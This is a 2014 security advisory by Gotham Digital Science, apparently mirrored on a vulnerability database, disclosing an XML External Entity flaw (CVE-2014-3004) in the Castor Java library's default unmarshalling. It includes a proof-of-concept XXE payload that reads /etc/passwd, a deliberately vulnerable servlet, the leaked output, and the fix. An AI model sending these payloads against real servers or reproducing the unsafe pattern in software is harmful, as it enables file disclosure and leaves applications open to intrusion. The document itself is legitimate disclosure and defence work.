Lucene search
K

Castor Library XXE Disclosure

🗓️ 30 May 2014 00:00:00Reported by Ron GutierrezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 107 Views

Castor Library XXE Disclosure - XML External Entity Attac

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: Netcool Operations Insight v1.6.8 addresses multiple security vulnerabilities.
11 Apr 202311:47
ibm
IBM Security Bulletins
Security Bulletin: XML External Entity Injection vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2014-3004
2 Nov 202221:46
ibm
IBM Security Bulletins
Security Bulletin: Multiple security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for October 2022
28 Oct 202209:50
ibm
IBM Security Bulletins
Security Bulletin: Vulnerability in Castor library affects IBM Cúram(CVE-2014-3004)
17 Jun 201813:05
ibm
IBM Security Bulletins
Security Bulletin: Castor Vulnerability Affects IBM Control Center (CVE-2014-3004)
30 Jul 202105:03
ibm
IBM Security Bulletins
Security Bulletin: XML External Entity Processing in Castor might affect WebSphere Lombardi Edition (CVE-2014-3004)
15 Jun 201807:02
ibm
IBM Security Bulletins
Security Bulletin: XML External Entity Processing in Castor might affect IBM Business Process Manager (CVE-2014-3004)
15 Jun 201807:02
ibm
IBM Security Bulletins
Security Bulletin: TADDM is vulnerable to a denial of service due to vulnerability in Castor Library
14 Jun 202314:02
ibm
IBM Security Bulletins
Security Bulletin: Multiple IBM InfoSphere Information Server components are vulnerable due to the following Castor Library vulnerability (CVE-2014-3004)
16 Jun 201814:09
ibm
IBM Security Bulletins
Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities
2 Dec 202121:41
ibm
Rows per page
`Castor Library Default Configuration could lead to XML External Entity  
(XXE) Attack  
Vulnerability Type: Local or Remote File Disclosure  
Reporter: Ron Gutierrez ([email protected]) and Adam Bixby (  
[email protected])  
Company: Gotham Digital Science ([email protected])  
Affected Software: Caster 1.3.3-RC1 Library and earlier  
CVE-Reference - CVE-2014-3004  
Severity: High  
  
===========================================================  
Summary  
===========================================================  
The Castor library is an Open Source data-binding framework for Java  
applications. One of its most useful functions are to provide for easy  
implementations of Java-to-XML binding. The library’s unmarshalling class,  
however, is susceptible to XML External Entity (XXE) attacks. If the XML  
that is being passed to the unmarshalling function is controllable by an  
end user, there is the potential that they could retrieve local resources,  
download malicious code from other servers, and/or open arbitrary TCP  
connections. For more information on XXE, please see  
  
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing  
  
===========================================================  
Technical Details  
===========================================================  
The Castor library’s unmarshalling functionality, if used with default  
settings, does not prevent the referencing of external entities or doctype  
declarations, opening up any application that utilizes this functionality  
to an XXE attack. Under the hood, the Castor library is using the Xerces  
SAX Parser, which needs to be configured securely in order to prevent these  
types of attacks. Castor does not have these secure settings turned on in  
the default configuration file and does not make reference to them anywhere  
in their documentation.  
  
XXE attacks come about due to the way in which XML parsers in general  
handle XML documents containing external entities. When an XML parser  
encounters a DOCTYPE declaring an external entity, it expands all instances  
of the entity with the contents of the URI reference that is being defined.  
For example, consider an XML document such as the following:  
  
<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE gds [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>  
  
<gds>&xxe;</gds>  
  
When the XML parser encounters "&xxe;” it will embed the contents of  
"/etc/passwd", which may then be returned in the server’s response,  
typically in an exception message.  
  
When you utilize the Castor library, the castor.properties file contains  
references to attributes that can be added to your SAX Parser  
configuration, however, it does not enable any of these hardening  
references out of the box. Unless the developer is acutely aware that they  
need to add these hardening references to their configuration, their  
application will be potentially vulnerable.  
  
  
===========================================================  
Proof-of-Concept Code and Exploit  
===========================================================  
Now let’s look at how Castor handles unmarshalling calls to show how an  
application could be vulnerable:  
  
In this simple class, we create Person object:  
..snip..  
  
public class Person implements java.io.Serializable {  
  
/** The name of the person */  
private String name = null;  
  
/** The Date of birth */  
private Date dob = null;  
  
/** Creates a Person with no name */  
public Person() {  
super();  
}  
  
/** Creates a Person with the given name */  
public Person(String name) { this.name = name; }  
  
..snip..  
  
Next, we generate a class that takes in external XML data to convert the  
XML document to a Person Object using the unmarshalling function:  
  
public static Person deserializePersonWithStatic(String xmlInput)  
{  
StringReader xmlReader = new StringReader(xmlInput);  
  
Person aPerson = null;  
try  
{  
aPerson = (Person) Unmarshaller.unmarshal(Person.class,  
xmlReader);  
}  
catch (Exception e)  
{  
System.out.println("Failed to unmarshal the xml");  
e.printStackTrace();  
}  
  
return aPerson;  
}  
  
  
If our application took in the XML data from a user controllable location  
and passed it through this unmarshalling function, the end user could use  
this functionality to view local resources on the application’s hosting  
server. For example, look at the following Servlet that takes in XML data  
from the Request:  
  
public class GeneratePerson extends HttpServlet {  
  
public void doPost(HttpServletRequest req, HttpServletResponse res)  
throws ServletException, IOException  
{  
String evilPersonXML = req.getParameter(“person”);  
  
Person anotherPerson = deserializePersonWithStatic(evilPersonXML);  
  
if(anotherPerson == null)  
{  
System.out.println("No Person Object set");  
}  
else  
{  
System.out.println("XXE Person name: " +  
anotherPerson.getName());  
}  
  
What would happen if we passed the following string into the “person”  
request parameter value?:  
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [  
<!ENTITY x3 SYSTEM "file:///etc/passwd"> ]  
><person><name>&x3;</name></person>  
  
The output would be the following:  
XXE Person name: ##  
# User Database  
#  
# Note that this file is consulted directly only when the system is running  
# in single-user mode. At other times this information is provided by  
# Open Directory.  
#  
# See the opendirectoryd(8) man page for additional information about  
# Open Directory.  
##  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:*:0:0:System Administrator:/var/root:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
..snip..  
  
As you can see, the unmarshalling function allowed external entities to be  
referenced and therefore the contents of the server’s /etc/passwd file was  
set within the “name” variable of the deserialized Person object.  
  
===========================================================  
Recommendation  
===========================================================  
Upgrade to Castor version 1.3.3 which now disables external entities by  
default.  
  
Alternatively, the manual fix for this issue is actually very simple. The  
main Castor configuration file (castor.properties) can be used to specify  
which XML features should be enable/disabled. In order to prevent the  
parser from reading external entities , the external-general-entities and  
the external-parameter-entities should be disable. Additionally, the  
disallow-doctype-decl option should be turned on. The following is what  
the entry in the caster.properties file should look like:  
  
# Comma separated list of SAX 2 features that should be enabled  
# for the default parser.  
#  
org.exolab.castor.sax.features=\  
http://apache.org/xml/features/disallow-doctype-decl  
  
# Comma separated list of SAX 2 features that should be disabled  
# for the default parser.  
#  
org.exolab.castor.sax.features-to-disable=\  
http://xml.org/sax/features/external-general-entities,\  
http://xml.org/sax/features/external-parameter-entities,\  
http://apache.org/xml/features/nonvalidating/load-external-dtd  
  
  
===========================================================  
About Gotham Digital Science  
===========================================================  
Gotham Digital Science (GDS) is a specialist security consulting company  
focused on helping our clients find, fix, and prevent security bugs in  
mission critical network infrastructure, web-based software applications,  
mobile apps and embedded systems. GDS is also committed to contributing to  
the security and developer communities through sharing knowledge and  
resources such as blog posts, security tool releases, vulnerability  
disclosures, and sponsoring and presenting at various industry conferences.  
For more information on GDS, please contact [email protected] or visit  
http://www.gdssecurity.com.  
  
--   
  
*Ron Gutierrez*  
Gotham Digital Science  
125 Maiden Lane Third Floor – New York, NY 10038  
[Office] 212.514.8318 x6 [Mobile] 718-213-0525 [Fax] 646.349.3911  
[Blog] http://blog.gdssecurity.com  
  
--   
  
  
  
Send safely and sleep soundly with our secure file sharing service,   
SendSafely (www.sendsafely.com)  
  
------------------------------  
This message is private and confidential. If you have received this message   
in error, please notify us and remove it from your system.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2014 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.07794
107